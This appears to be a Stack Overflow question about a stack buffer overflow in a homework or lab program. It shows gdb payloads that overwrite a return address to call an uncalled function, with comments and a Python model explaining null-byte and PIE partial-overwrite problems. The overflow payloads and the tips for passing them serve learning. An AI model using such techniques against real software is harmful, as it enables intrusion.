
I am using a buffer overflow to overwrite the return address and call another function. The name of the function I call by overwriting the return address is not_called. Here is how I create the payload:

(gdb) r $(python -c 'import sys; sys.stdout.write("A"*0x6c + "BBBB"+"\x3b\x42\x08\x08")')

The program works in the above case and the not_called function is called. The problem arises when the address of not_called is in this format: 0x57d. When I create the payload as follows:

(gdb) r $(python -c 'import sys; sys.stdout.write("A"*0x6c + "BBBB"+"\x7d\x05\x00\x00")')

I get the following error and the program won't work.

(gdb) r $(python -c 'import sys; sys.stdout.write("A"*0x6c + "BBBB"+"\x7d\x05\x00\x00")')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/aditya/Desktop/victim $(python -c 'import sys; sys.stdout.write("A"*0x6c + "BBBB"+"\x7d\x05\x00\x00")')
/bin/bash: warning: command substitution: ignored null byte in input
0xffffd07c

Program received signal SIGSEGV, Segmentation fault.
0x5600057d in ?? ()

I have two questions:

  • Is the bash warning ignoring the bytes 0,0 and not passing them?
  • Second, if you look at the address at SIGSEGV, it is 0x5600057d; it should have been 0x0000057d.

How can I create such an address?

Update: A little hack if someone just wants to experiment or do homework: do static linking (gcc -static) with stdlib.h, string.h, stdio.h. It will increase your program size. When you disassemble it, its address will be large enough. There is no general solution to the problem. You can see this post at Security Stackexchange.
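To see why the crash lands at 0x5600057d rather than 0x0000057d, here is an added Python model (not from the question or its comments) of the two effects at play: bash dropping every null byte from the command substitution, and the shortened argv string then only partially overwriting a PIE return address. The stack layout (0x6c bytes of filler, 4 bytes over the saved EBP, then the return address) is taken from the question's payload; the original return address 0x560006a0 is an assumed placeholder inside the 0x5600.... mapping seen in the crash.

```python
import struct

# Stack layout taken from the question's payload: 0x6c bytes of filler,
# 4 bytes that land on the saved EBP, then the 4-byte little-endian
# return address.
FILL_LEN = 0x6c
SAVED_EBP_LEN = 4

def build_payload(target):
    """Same bytes the question's python -c one-liner writes to stdout."""
    return b"A" * FILL_LEN + b"BBBB" + struct.pack("<I", target)

def survives_argv(target):
    """True if the 4-byte address contains no NUL, i.e. it can be passed
    as a command-line argument at all (the question's first point)."""
    return b"\x00" not in struct.pack("<I", target)

def through_argv(payload):
    """What bash hands the program after printing
    'ignored null byte in input': every NUL is dropped, not kept."""
    return payload.replace(b"\x00", b"")

def overwritten_return(original_ret, argv_bytes):
    """Model an unbounded string copy of argv_bytes into the buffer.
    The copy includes the C string's terminating NUL, and only the bytes
    that actually arrive replace the saved return address; the remaining
    high bytes keep whatever the assumed original (PIE) address held."""
    frame = bytearray(struct.pack("<I", original_ret))
    copied = argv_bytes + b"\x00"            # strcpy-style: terminator too
    tail = copied[FILL_LEN + SAVED_EBP_LEN:][:4]
    frame[:len(tail)] = tail
    return struct.unpack("<I", bytes(frame))[0]

if __name__ == "__main__":
    # Assumed original return address inside the PIE mapping at 0x5600....
    ORIGINAL_RET = 0x560006a0
    for target in (0x0808423b, 0x57d):
        arrived = through_argv(build_payload(target))
        print(hex(target), survives_argv(target),
              hex(overwritten_return(ORIGINAL_RET, arrived)))
```

For 0x0808423b all four bytes arrive and the return address becomes exactly that value; for 0x57d only 0x7d 0x05 plus the terminator arrive, the top byte 0x56 is untouched, and the result is the observed 0x5600057d.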

  • Bash uses C-style null-terminated strings as command-line arguments, so you can't have null bytes in the arguments. This is why exploits use stdin, not arguments. Commented Apr 29, 2021 at 13:51
  • @Barmar How do I pass this payload? I can use gets. I know I can store it in a file and use a pipe. But what do I do inside gdb? Commented Apr 29, 2021 at 14:06
  • stackoverflow.com/questions/8422259/… Commented Apr 29, 2021 at 14:09
  • r < filename or r < <(python -c ...) Commented Apr 29, 2021 at 14:09
  • @Barmar Same issue. I still get the address 0x5600057d. Commented Apr 29, 2021 at 14:15
